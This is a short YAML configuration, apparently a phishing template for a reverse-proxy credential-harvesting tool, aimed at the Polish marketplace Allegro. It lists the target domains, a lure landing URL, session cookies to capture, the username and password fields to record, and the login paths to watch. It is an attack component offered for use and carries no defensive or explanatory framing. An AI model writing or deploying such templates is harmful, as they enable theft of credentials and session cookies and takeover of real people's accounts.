creator: '@hash3liZer'
name: 'allegro'
proto: 'https'
http_version: '1.1'
landing: 'www.allegro.url/comeon'

domains:
  - 'allegro.pl'
  - 'allegro.com'

substitutions:
  - {domain: 'allegro.pl', search: '', replace: '', content_type: 'all'}

cookies:
  - 'poler'
  - 'domre'
  - 'coler'

captures:
  - {name: 'username', type: 'post'}
  - {name: 'password', type: 'get'}

authentication:
  - '/login/form/'
  - '/moje-allegro/moje-konto'
